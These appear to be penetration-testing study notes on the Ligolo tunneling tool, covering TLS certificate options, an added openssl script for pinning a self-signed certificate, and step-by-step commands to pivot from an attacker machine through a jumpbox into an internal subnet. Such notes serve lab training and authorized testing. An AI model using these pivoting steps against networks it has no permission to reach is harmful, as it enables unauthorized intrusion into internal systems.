Ligolo

  • proxy and agent files
  • we have to enter the internal network using the pivot box/jumpbox
  • Ligolo uses TLS certificates to encrypt the tunnel: -autocert
  • this might need an internet connection for certificate verification (in real pentests)
  • If we don't have an internet connection, we can add our own manually created certificate
  • OR use -selfcert on ligolo-proxy
    • Not recommended, as the tunnel might be exposed to MITM
  • use -ignore-cert on ligolo-agent
    • Use in testing env for debugging
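
The manually created certificate mentioned above, as an added example that is not part of the original notes or of the Ligolo project: it builds a self-signed certificate with openssl and derives its SHA-256 fingerprint, so the agent can pin the proxy certificate instead of skipping verification. The file names, the CN, and the ligolo-ng options -certfile, -keyfile and -accept-fingerprint shown in the comments are assumptions about the version in use.

```bash
#!/usr/bin/env bash
# Added example: self-signed proxy certificate plus the fingerprint to pin.
# Directory, file names and CN are constructed values for a lab setup.

# make_tunnel_cert DIR [CN] -> writes DIR/cert.pem and DIR/key.pem
make_tunnel_cert() {
    local dir="$1" cn="${2:-ligolo-lab}"
    mkdir -p "$dir" || return 1
    # umask in a subshell so the private key is created owner-readable only.
    ( umask 077
      openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 30 \
          -subj "/CN=${cn}" \
          -keyout "$dir/key.pem" -out "$dir/cert.pem" 2>/dev/null )
}

# cert_fingerprint CERT -> SHA-256 of the DER certificate as lowercase hex
cert_fingerprint() {
    openssl x509 -in "$1" -noout -fingerprint -sha256 \
        | sed -e 's/^.*=//' -e 's/://g' | tr 'A-F' 'a-f'
}

# key_matches_cert CERT KEY -> exit 0 only if KEY is the certificate's key.
# Catches the mistake of pairing a new cert with a stale key file.
key_matches_cert() {
    local from_cert from_key
    from_cert=$(openssl x509 -in "$1" -noout -pubkey 2>/dev/null) || return 1
    from_key=$(openssl pkey -in "$2" -pubout 2>/dev/null) || return 1
    [ -n "$from_cert" ] && [ "$from_cert" = "$from_key" ]
}

# Usage on the PWNBOX (option names are assumptions, see the lead-in):
#   make_tunnel_cert certs && key_matches_cert certs/cert.pem certs/key.pem
#   ./ligolo-proxy -certfile certs/cert.pem -keyfile certs/key.pem
#   cert_fingerprint certs/cert.pem      # copy this value to the JUMPBOX
# On the JUMPBOX, pin the value instead of using -ignore-cert:
#   ./ligolo-agent -connect 10.10.14.7:11601 -accept-fingerprint <hex value>
```

With a pinned fingerprint the agent refuses any certificate other than the one generated here, which addresses the MITM concern noted for -selfcert with -ignore-cert.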

Workflow:

  • Set up a tunnel interface/device for ligolo - PWNBOX
    • sudo ip tuntap add user kali mode tun ligolo
    • sudo ip link set ligolo up
  • Confirm that the ligolo interface was created (it might show DOWN):
    • ifconfig ligolo
    • ip addr show ligolo
  • Run the ligolo-proxy from PWNBOX
    • ./ligolo-proxy -selfcert
    • it now waits for connections
  • Run the ligolo-agent from the JUMPBOX
    • ./ligolo-agent -connect 10.10.14.7:11601 -ignore-cert
  • In ligolo-proxy on PWNBOX
    • we see a connection received message
    • session
      • and select the session
    • ifconfig
      • find the network subnet we want to tunnel into (e.g. 10.1.2.5/24)
  • Add a route - on PWNBOX
    • sudo ip route add 10.1.2.0/24 dev ligolo
  • In ligolo-proxy on PWNBOX
    • start
  • In the PWNBOX terminal
    • ping 10.1.2.4
    • run any command against the internal IP without the need for proxychains